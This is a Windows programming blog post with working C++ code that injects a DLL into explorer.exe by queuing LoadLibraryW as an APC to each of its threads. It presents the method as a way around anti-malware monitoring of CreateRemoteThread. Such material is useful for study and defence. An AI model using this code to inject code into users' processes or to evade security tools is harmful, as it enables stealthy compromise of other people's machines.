Injecting a DLL without a Remote Thread

March 14, 2017

A well-known technique for injecting a DLL into another process uses the CreateRemoteThread(Ex) function to create a thread in the target process and point its thread function at LoadLibraryA or LoadLibraryW, since these functions have the same signature (at the binary level) as a thread function. Before calling CreateRemoteThread, the caller uses VirtualAllocEx to allocate memory in the target process and WriteProcessMemory to copy the DLL path into it. This technique is simple and reliable, but has a couple of drawbacks:

  1. The target process must be opened with a relatively broad access mask that includes PROCESS_CREATE_THREAD.
  2. Anti-malware agents typically watch CreateRemoteThread calls closely and will flag them, since most processes have no need for such an operation. The canonical scenario for CreateRemoteThread is a debugger injecting a thread into its debuggee and then triggering a breakpoint, forcing a break-in into the process.

Another technique that can inject a DLL without creating any remote thread is to use an Asynchronous Procedure Call (APC). An APC is an object that wraps a function targeted at a particular thread. If we can somehow attach an APC to a thread running in the target process, we may be able to “force” that thread to load our DLL. There’s one snag with this approach, which we’ll get to in a moment.

Let’s say we want to inject our DLL into Explorer.exe, since it’s likely to be running, and code running inside Explorer is somewhat “trusted” by users. First, we need to locate Explorer, and then decide which thread to attach our APC to. We could pick a single thread inside Explorer, but it is better to queue the APC to all of its threads. Why? Because a user mode APC (the only kind we can queue from user mode) cannot force the target thread to execute it (that’s the “snag”). For a thread to execute its APCs, it must enter an “alertable” state, which it does by calling one of several functions, such as SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx or MsgWaitForMultipleObjectsEx, with the alertable option set. Only then do pending APCs get to run.

Let’s start by searching for a target process given its EXE name and getting back its ID and a list of threads:

#include <windows.h>
#include <tlhelp32.h>
#include <vector>
using std::vector;

bool FindProcess(PCWSTR exeName, DWORD& pid, vector<DWORD>& tids) {
    auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return false;

    pid = 0;

    PROCESSENTRY32 pe = { sizeof(pe) };
    if (::Process32First(hSnapshot, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, exeName) == 0) {
                pid = pe.th32ProcessID;
                THREADENTRY32 te = { sizeof(te) };
                if (::Thread32First(hSnapshot, &te)) {
                    do {
                        if (te.th32OwnerProcessID == pid) {
                            tids.push_back(te.th32ThreadID);
                        }
                    } while (::Thread32Next(hSnapshot, &te));
                }
                break;
            }
        } while (::Process32Next(hSnapshot, &pe));
    }

    ::CloseHandle(hSnapshot);
    return pid > 0 && !tids.empty();
}

The function uses the toolhelp functions to enumerate processes and threads, returning a process ID and a vector of thread IDs.

Now that we have a process and its threads, we can try to queue an APC to each thread using QueueUserAPC. The first step is opening a process handle with enough access to allocate and write memory in the target process address space:

DWORD pid;
vector<DWORD> tids;
if (FindProcess(L"explorer.exe", pid, tids)) {
    HANDLE hProcess = ::OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);

Notice that the PROCESS_CREATE_THREAD access right is not required. If the returned handle is valid (not NULL), we can move on to the real work. Next, we allocate a buffer inside the target process and copy our DLL’s full path into it:

auto p = ::VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
wchar_t buffer[] = L"g:\\temp\\MyLibrary.Dll";
::WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), nullptr);
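
The size passed to WriteProcessMemory is a byte count, and it must cover the terminating null character. With a fixed array, sizeof(buffer) already does both. If the path were held in a std::wstring instead (an assumption for this sketch, as is the helper name PathSizeInBytes), the size could be computed like this:

```cpp
#include <cstddef>
#include <string>

// Hypothetical helper: number of bytes needed to copy a wide-character
// path, including its terminating null character.
std::size_t PathSizeInBytes(const std::wstring& path) {
    return (path.size() + 1) * sizeof(wchar_t);
}
```

The result would be passed as the size argument together with path.c_str(), and it should not exceed the size of the buffer allocated with VirtualAllocEx (4 KB above).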

Now we can loop over all threads, obtain a handle for each, and queue an APC:

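    for (const auto& tid : tids) {
        HANDLE hThread = ::OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
        if (hThread) {
            ::QueueUserAPC((PAPCFUNC)::GetProcAddress(::GetModuleHandle(L"kernel32"), "LoadLibraryW"), hThread, (ULONG_PTR)p);
            // The APC stays queued after the handle is closed
            ::CloseHandle(hThread);
        }
    }
    // Do not free p here: the queued APCs may not have run yet, and
    // LoadLibraryW would then read the path from freed memory
    ::CloseHandle(hProcess);
}

Each thread handle is closed as soon as its APC is queued, and the process handle is closed once the loop is done. The path buffer is deliberately not freed at this point: the APCs run only when their threads next enter an alertable wait, so freeing the memory right away could leave LoadLibraryW reading a freed path. When the buffer is eventually released, VirtualFreeEx takes MEM_RELEASE alone with a size of 0.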

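We target the APC at the LoadLibraryW function because, again, its prototype is almost the same as that of an APC routine: both take a single pointer-sized argument. The only real difference is that an APC function does not return anything, but we don’t care about the return value here. The address we obtain with GetProcAddress in our own process is also valid in the target, because kernel32.dll is normally mapped at the same base address in every process of the same bitness. Once our DLL loads, its DllMain can do anything, such as creating a local thread to do whatever work we want inside Explorer.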

Queuing the APC to all threads increases the chance of the DLL loading, because it’s likely that some thread will enter an alertable wait state. There’s no harm if several threads run the APC: loading a DLL that is already loaded only increments its reference count, and its DllMain is not called again with DLL_PROCESS_ATTACH. Here’s my DLL inside Explorer.Exe:

[Image: the DLL loaded inside Explorer.exe]
